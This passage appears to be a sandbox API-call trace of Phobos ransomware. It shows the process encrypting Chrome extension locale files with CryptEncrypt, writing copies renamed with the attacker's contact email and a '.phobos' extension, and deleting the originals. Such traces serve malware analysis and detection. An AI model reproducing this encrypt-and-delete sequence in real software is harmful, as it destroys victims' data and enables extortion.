HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.994] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.005] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0155.006] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0155.006] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.006] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x115, lpOverlapped=0x0) returned 1 [0155.007] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120, dwBufLen=0x120 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120) returned 1 [0155.007] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x120, lpOverlapped=0x0) returned 1 [0155.008] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0155.008] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.008] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0155.008] CryptDestroyKey (hKey=0xa32d28) returned 1 [0155.008] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0155.008] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0155.008] CloseHandle (hObject=0x130) returned 1 [0155.009] CloseHandle (hObject=0x134) returned 1 [0155.009] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json")) returned 1 [0155.010] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0155.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0155.010] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=293) returned 1 [0155.010] CloseHandle (hObject=0x134) returned 1 [0155.011] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json")) returned 0x2020 [0155.011] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0155.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0155.011] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.011] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0155.011] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0155.012] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.012] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x125, lpOverlapped=0x0) returned 1 [0155.013] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x130, dwBufLen=0x130 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x130) returned 1 [0155.013] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x130, lpOverlapped=0x0) returned 1 [0155.014] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0155.014] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.014] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0155.014] CryptDestroyKey (hKey=0xa32d28) returned 1 [0155.014] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0155.014] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0155.014] CloseHandle (hObject=0x134) returned 1 [0155.014] CloseHandle (hObject=0x130) returned 1 [0155.015] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json")) returned 1 [0155.016] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0155.016] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0155.016] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=205) returned 1 [0155.016] CloseHandle (hObject=0x130) returned 1 [0155.016] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json")) returned 0x2020 [0155.016] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0155.016] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0155.017] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.017] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0155.017] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0155.017] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.017] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xcd, lpOverlapped=0x0) returned 1 [0155.018] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd0, dwBufLen=0xd0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd0) returned 1 [0155.018] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xd0, lpOverlapped=0x0) returned 1 [0155.019] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0155.019] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.019] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0155.019] CryptDestroyKey (hKey=0xa32d28) returned 1 [0155.019] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0155.020] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0155.020] CloseHandle (hObject=0x130) returned 1 [0155.020] CloseHandle (hObject=0x134) returned 1 [0155.020] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json")) returned 1 [0155.021] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0155.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0155.022] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=277) returned 1 [0155.022] CloseHandle (hObject=0x134) returned 1 [0155.022] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json")) returned 0x2020 [0155.022] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0155.022] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0155.022] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.022] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.022] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0155.023] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0155.023] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.023] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x115, lpOverlapped=0x0) returned 1 [0155.024] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120, dwBufLen=0x120 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120) returned 1 [0155.024] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x120, lpOverlapped=0x0) returned 1 [0155.025] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0155.025] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.025] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0155.025] CryptDestroyKey (hKey=0xa32d28) returned 1 [0155.025] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0155.025] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0155.026] CloseHandle (hObject=0x134) returned 1 [0155.026] CloseHandle (hObject=0x130) returned 1 [0155.026] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json")) returned 1 [0155.027] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0155.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0155.027] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=375) returned 1 [0155.028] CloseHandle (hObject=0x130) returned 1 [0155.028] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json")) returned 0x2020 [0155.028] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0155.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0155.028] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.028] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0155.029] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0155.029] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 